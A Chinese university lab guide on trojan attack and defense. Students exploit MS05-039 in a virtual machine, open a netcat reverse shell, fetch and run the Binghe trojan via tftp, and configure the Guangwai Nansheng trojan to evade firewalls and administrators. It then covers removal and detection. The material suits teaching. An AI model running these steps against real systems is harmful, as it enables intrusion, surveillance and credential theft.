實驗指導5：木馬攻擊與防范實驗指導書(共27頁)

1、實驗指導5 木馬攻擊與防范實驗1.實驗目的 理解和掌握木馬傳播和運行的機制，掌握檢查和刪除木馬的技巧，學會防御木馬的相關知識，加深對木馬的安全防范意識。2.預備知識2.1木馬及木馬技術的介紹（1）木馬概念介紹很多人把木馬看得很神秘，其實，木馬就是在用戶不知道的情況下被植入用戶計算機，用來獲取用戶計算機上敏感信息（如用戶口令，個人隱私等）或使攻擊者可以遠程控制用戶主機的一個客戶服務程序。這種客戶/服務模式的原理是一臺主機提供服務（服務器），另一臺主機使用服務（客戶機）。作為服務器的主機一般會打開一個默認的端口并進行監(jiān)聽（Listen），如果有客戶機向服務器的這一端口提出連接請求（Connect

2、Request），服務器上的相應守護進程就會自動運行，來應答客戶機的請求。通常來說，被控制端相當于一臺服務器，控制端則相當于一臺客戶機，被控制端為控制端提供預定的服務。（2）木馬的反彈端口技術由于防火墻對于進入的鏈接往往會進行非常嚴格的過濾，但是對于連出的鏈接卻疏于防范。于是，與一般的木馬相反，反彈端口型木馬的服務端 (被控制端)使用主動端口，客戶端 (控制端)使用被動端口。木馬定時監(jiān)測控制端的存在，發(fā)現(xiàn)控制端上線立即彈出端口主動連結(jié)控制端打開的主動端口；為了隱蔽起見，控制端的被動端口一般開在80，這樣，即使用戶使用端口掃描軟件檢查自己的端口，發(fā)現(xiàn)的也是類似TCP UserIP:1026 Co

3、ntrollerIP:80 ESTABLISHED的情況，稍微疏忽一點，你就會以為是自己在瀏覽網(wǎng)頁 。（3）線程插入技術木馬程序的攻擊性有了很大的加強，在進程隱藏方面，做了較大的改動，不再采用獨立的EXE可執(zhí)行文件形式，而是改為內(nèi)核嵌入方式、遠程線程插入技術、掛接PSAPI等。這樣木馬的攻擊性和隱藏性就大大增強了。2.2 木馬攻擊原理特洛伊木馬是一個程序，它駐留在目標計算機里，可以隨計算機自動啟動并在某一端口進行偵聽，在對接收的數(shù)據(jù)識別后，對目標計算機執(zhí)行特定的操作。木馬，其實質(zhì)就是一個通過端口進行通信的網(wǎng)絡客戶/服務程序。 （1）基本概念網(wǎng)絡客戶/服務模式的原理是一臺主機提供服務(服務器)，

4、另一臺主機接受服務(客戶機)。作為服務器的主機一般會打開一個默認的端口并進行監(jiān)聽(Listen)， 如果有客戶機向服務器的這一端口提出連接請求(Connect Request)， 服務器上的相應程序就會自動運行，來應答客戶機的請求，這個程序稱為守護進程(UNIX的術語，不過已經(jīng)被移植到了MS系統(tǒng)上)。對于特洛伊木馬，被控制端就成為一臺服務器，控制端則是一臺客戶機，G_server.exe是守護進程， G_client是客戶端應用程序。 （2）實現(xiàn)木馬的控制功能 由于Win98開放了所有的權限給用戶，因此，以用戶權限運行的木馬程序幾乎可以控制一切，下面僅對木馬的主要功能進行簡單的概述， 主要是使

5、用Windows API函數(shù)。 遠程監(jiān)控(控制對方鼠標、鍵盤，并監(jiān)視對方屏幕) l keybd_event模擬一個鍵盤動作。l mouse_event模擬一次鼠標事件l mouse_event(dwFlags，dx，dy，cButtons，dwExtraInfo)dwFlags: l MOUSEEVENTF_ABSOLUTE 指定鼠標坐標系統(tǒng)中的一個絕對位置l MOUSEEVENTF_MOVE 移動鼠標 l MOUSEEVENTF_LEFTDOWN 模擬鼠標左鍵按下 l MOUSEEVENTF_LEFTUP 模擬鼠標左鍵抬起 l MOUSEEVENTF_RIGHTDOWN 模擬鼠標右鍵按下 l

6、 MOUSEEVENTF_RIGHTUP 模擬鼠標右鍵按下l dx，dy:MOUSEEVENTF_ABSOLUTE中的鼠標坐標。 記錄各種口令信息 keylog begin：將擊鍵記錄在一個文本文件里，同時還記錄執(zhí)行輸入的窗口名。 獲取系統(tǒng)信息 a.取得計算機名 GetComputerName b.更改計算機名 SetComputerNamec.當前用戶 GetUserName d.系統(tǒng)路徑 e.取得系統(tǒng)版本 f.當前顯示分辨率 限制系統(tǒng)功能 a.遠程關機或重啟計算機，使用WinAPI中的如下函數(shù)可以實現(xiàn)。ExitWindowsEx(UINT uFlags，DWORD dwReserved)當

7、uFlags=EWX_LOGOFF 中止進程，然后注銷 =EWX_SHUTDOWN 關掉系統(tǒng)但不關電源 =EWX_REBOOT 重新引導系統(tǒng) =EWX_FORCE強迫中止沒有響應的進程 =EWX_POWERDOWN 關掉系統(tǒng)及關閉電源 b.鎖定鼠標，ClipCursor(lpRect As RECT)可以將指針限制到指定區(qū)域，或者用ShowCursor(FALSE)把鼠標隱藏起來也可以，RECT是定義的一個矩形。 c.讓對方掉線 RasHangUp d.終止進程 ExitProcess e.關閉窗口 利用FindWindow函數(shù)找到窗口并利用SendMessage函數(shù)關閉窗口 遠程文件操作 刪

8、除文件：File delete拷貝文件：File copy 共享文件：Export list（列出當前共享的驅(qū)動器、目錄、權限及共享密碼） 注冊表操作 在VB中只要Set RegEdit=CreateObject（"WScript.Shell")就可以使用以下的注冊表功能： 刪除鍵值:RegEdit.RegDelete RegKey 增加鍵值:RegEdit.Write RegKey，RegValue 獲取鍵值:RegEdit.RegRead (Value) 2.3 木馬的防范建議A.不要隨意打開來歷不明的郵件現(xiàn)在許多木馬都是通過郵件來傳播的，當你收到來歷不明的郵件時，請不

9、要打開，應盡快刪除。并加強郵件監(jiān)控系統(tǒng)，拒收垃圾郵件。B.不要隨意下載來歷不明的軟件最好是在一些知名的網(wǎng)站下載軟件，不要下載和運行來歷不明的軟件。在安裝軟件的同時最好用殺毒軟件查看有沒有病毒，之后才進行安裝。C.及時修補漏洞和關閉可疑的端口一般木馬都是通過漏洞在系統(tǒng)上打開端口留下后門，以便上傳木馬文件和執(zhí)行代碼，在把漏洞修補上的同時，需要對端口進行檢查，把可疑的端口關閉。D.盡量少用共享文件夾如果必須使用共享文件夾，則最好設置帳號和密碼保護。注意千萬不要將系統(tǒng)目錄設置成共享，最好將系統(tǒng)下默認共享的目錄關閉。Windows系統(tǒng)默認情況下將目錄設置成共享狀態(tài)，這是非常危險的。E.運行實時監(jiān)控程序

10、在上網(wǎng)時最好運行反木馬實時監(jiān)控程序和個人防火墻，并定時對系統(tǒng)進行病毒檢查。F.經(jīng)常升級系統(tǒng)和更新病毒庫。3.實驗環(huán)境1）預備知識要求l 了解網(wǎng)絡的基本知識；l 熟練使用windows操作系統(tǒng)；l 充分理解木馬攻擊原理；l 熟悉緩沖溢出攻擊。2）下載和運行木馬軟件期間，請關閉殺毒軟件的自動防護功能以及防火墻，否則程序會被當作病毒而強行終止。3.1 運行環(huán)境1）需要下載的其它的工具軟件有：l tftpd32.exe：tftp服務程序，用來傳輸“冰河”木馬服務端程序l nc.exe:緩沖溢出攻擊反向連接服務程序（參見“緩沖區(qū)溢出攻擊與防范實驗” ）；l Ms05039.exe:緩沖溢出攻擊工具（參見

11、“緩沖區(qū)溢出攻擊與防范實驗” ）；l 冰河木馬.exe:冰河木馬程序；l gwboy092.exe：“廣外男生”木馬程序。2）本實驗需要用到虛擬機，因此每臺實驗主機都通過安裝軟件WMware Workstation分割出虛擬機。真實主機P1的配置為：操作系統(tǒng)Windows2000 server或者windows xp sp2，并且安裝ms05-039.exe緩沖區(qū)溢出攻擊軟件，“冰河”木馬，“廣外男生”木馬。虛擬機P2配置為：操作系統(tǒng)Windows2000 Server（沒有打補丁，存在ms05039漏洞，并且安裝了IIS組件）。3）實驗環(huán)境拓撲如圖1所示：圖1 實驗網(wǎng)絡拓撲圖請根據(jù)實驗環(huán)境將

12、IP地址填入下表，攻防實驗服務器IPP1:本機IPP2:本機上的虛擬機IPP3:表1 實驗IP實驗中，可把真實機P2作為攻擊機，安裝上“冰河”木馬程序，ms05039.exe，nc.exe，tftpd32.exe和“廣外男生”；虛擬機P3作為被攻擊主機，安裝IIS組件。4.實驗內(nèi)容和步驟4.1 實驗任務一：“冰河”木馬本實驗需要把真實主機作為攻擊機，虛擬機作為靶機。即首先利用ms05039溢出工具入侵虛擬機，然后利用“冰河”木馬實現(xiàn)對虛擬機的完全控制。最后對木馬進行查殺。A.“冰河”使用：冰河是一個基于TCP/IP協(xié)議和Windows操作系統(tǒng)的網(wǎng)絡工具，所以首先應確保該協(xié)議已被安裝且網(wǎng)絡連接無

13、誤，然后配置服務器程序(如果不進行配置則取默認設置)，并在欲監(jiān)控的計算機上運行服務器端監(jiān)控程序即可。主要文件包括：a. G_Server.exe: 被監(jiān)控端后臺監(jiān)控程序(運行一次即自動安裝，可任意改名)，在安裝前可以先通過“G_Client”的配置本地服務器程序功能進行一些特殊配置，例如是否將動態(tài)IP發(fā)送到指定信箱、改變監(jiān)聽端口、設置訪問口令等)；b. G_Client.exe: 監(jiān)控端執(zhí)行程序，用于監(jiān)控遠程計算機和配置服務器程序。具體功能操作包括：a.添加主機：將被監(jiān)控IP地址添加至主機列表，同時設置好訪問口令及端口，設置將保存在Operate.ini文件中，以后不必重輸。如果需要修改設置，

14、可以重新添加該主機，或在主界面工具欄內(nèi)重新輸入訪問口令及端口并保存設置。b. 刪除主機：將被監(jiān)控端IP地址從主機列表中刪除。c. 自動搜索：搜索指定子網(wǎng)內(nèi)安裝有冰河的計算機。d. 查看屏幕：查看被監(jiān)控端屏幕。e. 屏幕控制：遠程模擬鼠標及鍵盤輸入。f.“冰河”信使：點對點聊天室。g. 修改遠程配置：在線修改訪問口令，監(jiān)聽端口等服務器程序設置，不需要重新上傳整個文件，修改后立即生效。B.在對“冰河”有所了解之后，我們進入攻防實驗階段使用“冰河”對目標計算機進行控制：在目標主機（虛擬機）上植入木馬，即在此主機上運行G_Sever，作為服務器端；在攻擊機上運行G_Client，作為控制端。分別運行這

15、兩個.exe文件后，我們進入控制端主界面，按照以下步驟來實現(xiàn)對目標主機的控制。步驟1：入侵準備工作1）下載和安裝木馬軟件前，關閉殺毒軟件的自動防護功能，避免程序會被當作病毒而強行終止。2）運行G_CLIENT.EXE，如圖2；圖2 “冰河”運行主界面3）選擇菜單“設置”->“配置服務程序”，如圖3；圖3 設置木馬服務4）設置訪問口令為“1234567”，其它為默認值，點擊 “確定”生成木馬的服務端程序G_SERVER.EXE。5）將生成的木馬服務程序G_SERVER.EXE拷貝到tftp服務的目錄即C:攻防tftp32，如圖4。圖4將G_SERVER.EXE拷貝到目錄C:攻防tftp32

16、6）運行tftpd32.exe，如圖5。保持此程序一直開啟，用于等待攻擊成功后傳輸木馬服務程序。圖5 tftp服務運行步驟2：進行攻擊，將木馬放置在被攻擊端1)對靶機P3進行攻擊，首先運行nc -vv -l -p 99接著再開一個dos窗口，運行ms05039 3 99 1(注意：此次IP地址請根據(jù)實際IP地址修改)2)攻擊成功后，在運行nc -vv -l -p 99 的dos窗口中出現(xiàn)如圖6提示，若攻擊不成功請參照“緩沖區(qū)溢出攻擊與防范實驗”，再次進行攻擊。圖6 攻擊成功示意3）在此窗口中運行tftp -i get

17、g_server.exe將木馬服務程序G_server.exe上傳到靶機P3上，并直接輸入g_server.exe使之運行，如圖7。圖7 上載木馬程序并運行步驟3：運行木馬客戶程序控制遠程主機1）打開程序端程序，單擊快捷工具欄中的“添加主機”按扭，如圖8所示。ü “顯示名稱”：填入顯示在主界面的名稱“target”ü “主機地址”：填入服務器端主機的IP地址“3”。ü “訪問口令”：填入每次訪問主機的密碼，這里輸入“1234567”。ü “監(jiān)聽端口”：“冰河”默認的監(jiān)聽端口是7626，控制端可以修改它以繞過防火墻。圖8 添加主機單

18、擊“確定”按扭，即可以看到主機面上添加了主機，如圖16。圖9 添加主機后主界面這時我們就可以像操作自己的電腦一樣操作遠程目標電腦，比如打開C:WINNTsystem32config目錄可以找到對方主機上保存用戶口令的SAM文件。點擊鼠標右鍵，可以發(fā)現(xiàn)有上傳和下載功能。即可以隨意將虛擬機器上的機密文件下載到本機上，也可以把惡意文件上傳到該虛擬機上并運行?？梢?，其破壞性是巨大的。2）“文件管理器”使用。點擊各個驅(qū)動器或者文件夾前面的展開符號，可以瀏覽目標主機內(nèi)容。如圖17所示，通過瀏覽可以發(fā)現(xiàn)目標主機的敏感信息，如“銀行賬號”等。圖9 瀏覽至敏感信息然后選中文件，在右鍵菜單中選中“下載文件至.”，

19、在彈出的對話框中選好本地存儲路徑，點擊“保存”。下載成功是界面如圖10。圖10 成功下載文件后界面2）“命令控制臺”使用。單擊“命令控制臺”的標簽，彈出命令控制臺界面，如圖11，驗證控制的各種命令。圖11 命令控制臺 a. 口令類命令：展開“口令類命令”，如圖12圖12口令類命令 a.1 “系統(tǒng)信息及口令”可以查看遠程主機的系統(tǒng)信息，開機口令，緩存口令等。 a.2 “歷史口令”可以查看遠程主機以往使用的口令。 a.3 “擊鍵記錄”可以記錄遠程主機用戶擊鍵記錄，以次可以分析出遠程主機的各種帳號和口令或各種秘密信息。 b. 控制類命令：展開“控制類命令”，如圖13。圖13 控制類命令 b.1 “捕

20、獲屏幕” 可以使控制端使用者查看遠程主機的屏幕。 b.2 “發(fā)送信息” 可以向遠程計算機發(fā)送Windows標準的各種信息。 b.3 “進程管理” 可以使控制者查看遠程主機上所有的進程，如圖14。單擊“查看進程”按鈕，就可以看到遠程主機上存在的進程，甚至還可以終止某個進程，只要選中相應的進程，然后單擊“終止進程”就可以了。圖14 遠程主機進程控制 b.4 “窗口管理” 可以使遠程主機上的窗口進行刷新，最大化，最小化，激活，隱藏等。 b.5 “系統(tǒng)管理” 可以使遠程主機進行關機，重啟，重新加載“冰河”，自動卸載“冰河”的操作。 b.6 “鼠標控制” 可以使遠程主機上的鼠標鎖定在某個范圍內(nèi)。 b.7

21、 “其他控制” 可以使遠程主機上進行自動撥號禁止，桌面隱藏，注冊表鎖定等操作。c 網(wǎng)絡類命令 展開“網(wǎng)絡類命令”，如圖15:c.1 “創(chuàng)建共享”在遠程主機上創(chuàng)建自己的共享。 c.2 “刪除共享”在遠程主機上刪除某個特定的共享。 c.3 “網(wǎng)絡信息”可以看到遠程主機上的IPC$，C$，ADMIN$等共享。 d 文件類命令： 展開“文件類命令”，"文件瀏覽"，“文件查找”，“文件壓縮”，“文件刪除”，“文件打開”等。 e 注冊表讀寫： 展開“注冊表讀寫” f 設置類命令: 展開“設置類命令”圖15 網(wǎng)絡命令步驟4：刪除“冰河”木馬刪除“冰河”木馬的方法：A客戶端的自動卸載功能，

22、在“控制命令類”中的“系統(tǒng)控制”里面就有自動卸載功能，執(zhí)行這個功能，遠程主機上的木馬就自動卸載了。B手動卸載，查看注冊表，打開windows注冊編輯器。² 打開HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun如圖16。在目錄中發(fā)現(xiàn)了一個默認的鍵值C:WINNTSystem32kernel32.exe，這就是“冰河”木馬在注冊表中加入的鍵值，將它刪除。² 打開HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVesionRunservices，如圖17。在目錄

23、中也發(fā)現(xiàn)了一個默認的鍵值C:WINNTSystem32kernel32.exe，這也是“冰河”在注冊表中加入的鍵值，將它刪除。上面兩個注冊表的子鍵目錄Run和Runservices中存放的鍵值是系統(tǒng)啟動時自啟動的程序，一般病毒程序，木馬程序，后門程序等都放在這些子鍵目錄下，所以要經(jīng)常檢查這些目錄下的程序。圖16 注冊表編輯圖17注冊表編輯² 然后再進入C:WINNTSystem32目錄，找到“冰河”的兩個可執(zhí)行文件Kernel32.exe和Sysexplr.exe文件，將它們刪除，如圖18。圖18 刪除木馬程序² 修改文件關聯(lián)也是木馬常用的手段，“冰河”將txt文件的缺省打

24、開方式由notepad.exe改為木馬的啟動程序，除此之外，html，exe，zip，com等都是木馬的目標。所以，最后還需要恢復注冊表中的txt文件關聯(lián)功能，只要將注冊表中的HKEY_CLASSES_ROOTtxtfileshellopencommand下的默認值，改為C:Windowsnotpad.exe %1，即可，如圖19。這樣，再次重啟計算機我們就完全刪除了“冰河”木馬。C殺毒軟件查殺 大部分殺毒軟件都有查殺木馬的功能，可以通過這個功能對主機進行全面掃描來去除木馬，就徹底把木馬文件刪除了。圖19 去除關聯(lián)4.2 實驗任務二：“廣外男生”木馬本實驗將真實機作為攻擊機，虛擬機作為靶機。真

25、實機利用“廣外男生”木馬對虛擬機進行攻擊，最終完全取得虛擬機的控制權。最后學習木馬的查殺。1）“廣外男生”的連接運行gwboy.exe，打開“廣外男生”的主程序，主界面如圖20。圖20 “廣外男生”主界面進行客戶端設置。依次單擊“設置”“客戶端設置”，彈出客戶端設置界面如圖21。我們可以看到它采用“反彈窗口線程插入技術”的提示。在“客戶端最大連接數(shù)”中填入允許多少臺客戶端主機來控制服務器端，注意不要太多，否則容易造成服務器端主機死機。在“客戶端使用端口”填入服務器端連接到客戶端的那個端口，這是迷惑遠程服務器端主機管理員和防火墻的關鍵，填入一些常用端口，會使遠程主機管理員和防火墻誤以為連接的是個

26、合法的程序。比如使用端口80（此例中，為避免端口沖突，我們使用1500端口）。選擇“只允許以上地址連接”選項，使客戶端主機IP地址處于默認的合法控制IP地址池中。圖21客戶端設置程序（2）設置木馬的連接類型，如果使用反彈端口方式二則在彈出對話框中選中“使用HTTP網(wǎng)頁IP通知”；如果使用反彈端口方式一，則選擇“客戶處于靜態(tài)IP（固定IP地址）”，如圖22。此處我們選擇后者。單擊“下一步”，和“完成”，結(jié)束客戶端設置。圖22 木馬連接類型設置（4）進行服務器端設置。依次單擊“設置”“生成服務器端”，這時彈出“廣外男生”服務器端生成向?qū)?，直接單擊“下一步”，彈出常?guī)設置界面，如圖23。圖23 服務

27、器端設置在“EXE文件名”和“DLL文件名”中填入加載到遠程主機系統(tǒng)目錄下的可執(zhí)行文件和動態(tài)鏈接庫文件，在“注冊表項目”中填入加載到遠程主機注冊表中的Run目錄下的鍵值名。這些文件名都是相當重要的，因為這是迷惑遠程主機管理員的關鍵所在，如果文件名起的非常隱蔽，如sysremote.exe， sysremote.dll，那么就算管理員發(fā)現(xiàn)了這些文件也不肯定這些文件就是木馬而輕易刪除。注意：把“服務器端運行時顯示運行標志并允許對方退出”前面的對勾去掉，否則服務器端主機的管理員就可以輕易發(fā)現(xiàn)自己被控制了。（5）進行網(wǎng)絡設置，如圖24選擇“靜態(tài)IP”，在“客戶端IP地址”中填入入侵者的靜態(tài)IP地址（即

28、真實機IP），“客戶端用端口”填入在客戶端設置中選則的連接端口。圖24 網(wǎng)絡設置（6）生成代理文件，在“目標文件”中填入所生成服務器端程序的存放位置，如E:gwboy092Ahacktest.exe，這個文件就是需要植入遠程主機的木馬文件。單擊“完成”即可完成服務器端程序的設置，這時就生成了一個文件名為hacktest.exe的可執(zhí)行文件，如圖25，并將該文件拷貝到虛擬機桌面上圖25 生成代理文件（7）進行客戶端與服務器連接。在虛擬機上執(zhí)行木馬程序hacktest.exe，等待一段時間后客戶端主機“廣外男生”顯示連接成功， 如圖26。這時，就可以和使用第2代木馬“冰河”一樣控制遠程主機，主要的

29、控制選項有“文件共享”，“遠程注冊表”，“進程與服務”，“遠程桌面”等。圖26 客戶端與服務器連接成功2）命令行下“廣外男生”的檢測（1）由于使用了“線程插入技術”，所以在windows系統(tǒng)中采用任務管理器查看線程是發(fā)現(xiàn)不了木馬的蹤跡的，只能看到一些正常的線程在運行，所以需要用到另外兩個工具：fport和tlist。fport是第三方提供的一個工具，可以查看某個具體的端口被哪個進程所占用，并能查看PID。tlist是windows資源工具箱中提供的工具，功能非常強大，我們利用它查看進程中有哪些動態(tài)鏈接庫正在運行，這對于檢測插入在某個正常進程中的線程是非常有用的。【問題2】：什么是“線程插入技術”？ （2）在服務器端主機（虛擬機）上依次單擊“開始”“運行”，輸入cmd，進入命令行提示符，在這里輸入netstat -an，查看網(wǎng)絡端口占用狀態(tài)，如圖27。在顯示結(jié)果中，發(fā)現(xiàn)可疑IP地址（就是客戶端IP地址）與本機建立了連接，這是我們需要注意的地方，記住本機用于連接的端口號1231，1232，1233，1234。圖27 命令行下鍵入netstat an命令（3）接著在提示符下輸入fport (注意，要在有fport.exe的目錄中運行f